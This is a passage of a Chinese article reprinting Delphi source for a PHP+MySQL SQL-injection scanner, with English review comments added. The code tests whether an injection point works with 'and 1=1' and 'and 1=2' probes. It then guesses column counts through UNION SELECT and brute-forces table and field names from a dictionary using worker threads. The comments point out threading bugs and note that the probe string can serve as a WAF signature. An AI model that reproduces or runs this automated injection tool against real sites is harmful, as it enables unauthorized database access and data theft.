PHP+MYSQL网站注入扫描[16]

[入库:2005年8月18日] [更新:2007年3月24日]

本文简介:选自 lanyus 的 blog

入点是否可用。。。');
if (not get(furl,'')) or (not get(furl+'/**/and/**/1=1/*',''))
    or (not get(furl+'/**/and/**/1=2/*','')) then
begin
  fmemo.lines.add('注入点不可用,猜解终止!');
  exit;
end;
//开始猜解字段数目
i:=1;
istr:='1';
fstate :=false;
fmemo.lines.add('');
fmemo.lines.add('开始猜解字段数目。。。');
fmemo.lines.add('');
while not fstate do
begin
  inc(i);
  if i>30 then
  begin
    fmemo.lines.add('最大猜解字段数大于30,猜解终止!');
    fstate :=true;
    exit;
  end;
  istr:=istr+','+inttostr(i);
  injurl :=furl+'/**/and/**/1=1/**/union/**/select/**/'+istr+'/*';
  fmemo.lines.add(injurl);
  if get(injurl,fkeyword) then
  begin
    fstate :=true;
    fmemo.lines.add('');
    fmemo.lines.add('字段数目猜解结束!共找到'+inttostr(i)+'个字段。');
    form1.edtfieldnum.text :=inttostr(i);
    form1.spnum.maxvalue :=i;
    form1.spnum.text :=inttostr(i);
    form1.spfield1.maxvalue :=i;
    form1.spfield2.maxvalue :=i;
    exit;
  end;
end;
end;

// Stores the probe parameters and the UI controls the thread reports into,
// then starts the thread right away (inherited create(false) = not suspended).
// The thread frees itself when execute returns (freeonterminate).
constructor scantablethread.create(url,str,keyword:string;memo:tmemo;listview:tlistview);
begin
  // request parameters
  furl := url;
  fstr := str;
  fkeyword := keyword;
  // UI sinks written from execute / scantableresult
  fmemo := memo;
  flistview := listview;
  freeonterminate := true;
  // NOTE(review): cs appears to be shared across thread classes, and every
  // constructor in this unit re-initialises it; re-initialising a critical
  // section another thread may already hold is undefined, and nothing in view
  // ever calls deletecriticalsection. Kept as-is (behaviour-preserving rewrite).
  initializecriticalsection(cs);
  //inherited create(furl,fkeyword,fmemo);
  inherited create(false);
end;

// Main-thread callback (reached through synchronize from execute): appends one
// row to flistview whose caption is the row count after the insert and whose
// first sub-item is the dictionary entry currently held in fvalue.
procedure scantablethread.scantableresult;
var
  row: tlistitem;
begin
  row := flistview.items.add;
  row.caption := inttostr(flistview.items.count);
  row.subitems.add(fvalue);
end;

// Table-name guessing on a single worker thread: for every entry of the
// form1.lsbdict list box, builds one probe URL and records the entry in
// flistview when get() reports fkeyword in the response.
// The whole loop runs under the cs critical section (cs looks unit-global),
// so two scantablethread instances cannot probe at the same time.
// NOTE(review): fmemo and form1.pg1 are VCL controls written directly from
// this worker thread; only the flistview update goes through synchronize.
procedure scantablethread.execute;
var i:integer;
begin
stoped :=false; // stop flag; declared outside this chunk, presumably set by the form
with form1 do
begin
  // progress bar: one step per dictionary entry
  pg1.min :=0;
  pg1.max :=form1.lsbdict.count;
  pg1.step :=1;
  pg1.position :=0;
  pg1.visible :=true;
end;
entercriticalsection(cs); // held until the leavecriticalsection after the loop
fmemo.lines.add('');
fmemo.lines.add('开始猜解表段。。。');
fmemo.lines.add('');
for i:=0 to form1.lsbdict.count-1 do
begin
  if stoped then
  begin
    fmemo.lines.add('');
  fmemo.lines.add('表段猜解结束。。。');
  form1.pg1.visible :=false;
  // NOTE(review): this exit returns without leavecriticalsection(cs), so cs
  // stays owned by a thread that is about to terminate.
  exit;
  end;
  // NOTE(review): as printed this assigns the whole items list to a string;
  // scanfieldthread.execute indexes items[fnum], so an index [i] was probably
  // lost when the listing was copied — verify against the original source.
  fvalue :=form1.lsbdict.items;
  if fvalue='' then continue;
  // probe URL; the fixed '/**/and/**/1=1/**/union/**/select' sequence is a
  // stable signature for this tool in web-server logs and WAF rules
  injurl :=furl+'/**/and/**/1=1/**/union/**/select/**/'+fstr+'/**/from/**/'+fvalue+'/*';
  fmemo.lines.add(injurl);
  form1.pg1.stepit;
  // get() is defined outside this chunk; it appears to return true when the
  // response contains fkeyword — confirm against its definition
  if get(injurl,fkeyword) then
  begin
    synchronize(scantableresult); // list-view update on the main thread
  end;
end;
fmemo.lines.add('');
fmemo.lines.add('表段猜解结束。。。');
form1.pg1.visible :=false;
leavecriticalsection(cs);
sleep(20); // brief pause before the thread ends (freeonterminate)
end;

// One scanfieldthread probes a single dictionary entry (index num); per the
// original author's note, the caller creates several of these, one per entry.
// Stores the parameters and UI targets, then starts the thread immediately.
constructor scanfieldthread.create(url,str,keyword,table:string;num:integer;memo:tmemo;listview:tlistview);
begin
  // request parameters
  furl := url;
  fstr := str;
  ftable := table;
  fkeyword := keyword;
  fnum := num;
  // UI sinks
  fmemo := memo;
  flistview := listview;
  freeonterminate := true; // thread frees itself after execute
  // NOTE(review): every constructor in this unit re-initialises the shared cs;
  // re-initialising a critical section another thread may hold is undefined,
  // and nothing in view deletes it. Kept as-is (behaviour-preserving rewrite).
  initializecriticalsection(cs);
  //inherited create(furl,fkeyword,fmemo);
  inherited create(false); // start now (not suspended)
end;

// Main-thread callback (reached through synchronize from execute): appends one
// row to flistview, captioned with the row count after the insert, carrying
// the matched dictionary entry (fvalue) as its first sub-item.
procedure scanfieldthread.scanfieldresult;
var
  row: tlistitem;
begin
  row := flistview.items.add;
  row.caption := inttostr(flistview.items.count);
  row.subitems.add(fvalue);
end;

// Field-name probe for one dictionary entry (index fnum): substitutes the
// entry for the '&fieldname&' placeholder in fstr, issues one get() against
// table ftable and records the entry in flistview on a hit.
// NOTE(review): the constructor's comment says many of these threads run at
// once, but the memo write, the request and the synchronize all sit inside
// cs, so the probes are effectively serialised.
procedure scanfieldthread.execute;
var
i:integer;      // unused in this body
tmpstr:string;  // fstr with the placeholder substituted
begin
fvalue :=form1.lsbdict.items[fnum];
// flags are [rfignorecase] without rfreplaceall, so only the first occurrence
// of the placeholder is replaced
tmpstr :=stringreplace(fstr,'&fieldname&',fvalue,[rfignorecase]);
// same fixed '/**/and/**/1=1/**/union/**/select' sequence as the table scan;
// a stable signature for this tool in web-server logs and WAF rules
injurl:=furl+'/**/and/**/1=1/**/union/**/select/**/'+tmpstr+'/**/from/**/'+ftable+'/*';
entercriticalsection(cs); // serialises memo write, request and list-view update
fmemo.lines.add(injurl);
if get(injurl,fkeyword) then // get() is defined outside this chunk
begin
  synchronize(scanfieldresult); // list-view update on the main thread
end;
leavecriticalsection(cs);
sleep(20); // brief pause before the thread ends (freeonterminate)
end;

end.


//后台管理扫描线程类
unit unit3;

interface

uses
classes,stdctrls,windows,sysutils,comctrls,wininet;

var
cs:trtlcriticalsection;   // unit-global critical section, presumably shared by every scanmanagerthread; its initialisation and deletion are not visible in this chunk

type
// Worker thread for the back-end admin-path scan named in the unit header
// comment. Only the declaration is visible here; create and execute are
// defined in the implementation section, which is cut off at the end of this
// chunk.
scanmanagerthread = class(tthread)
private
  tmplbx :tlistbox;   // list box passed as lbx to create; presumably the candidate list — verify
  tmpmemo :tmemo;     // log output passed as memo to create
  tmpnum :integer;    // the num argument of create; meaning not visible here
  tmpurl :string;     // the url argument of create
  str :string;
  procedure scanresult;   // presumably the synchronize target that reports a hit, as in the other thread classes — verify
protected
  procedure execute; override;
public
  constructor create(url:string; num: integer;lbx: tlistbox;memo:tmemo);
end;

implementation

uses unit1;

constructor scanmanagerthread.create(url:string; num: integer;lbx: tlistbox;
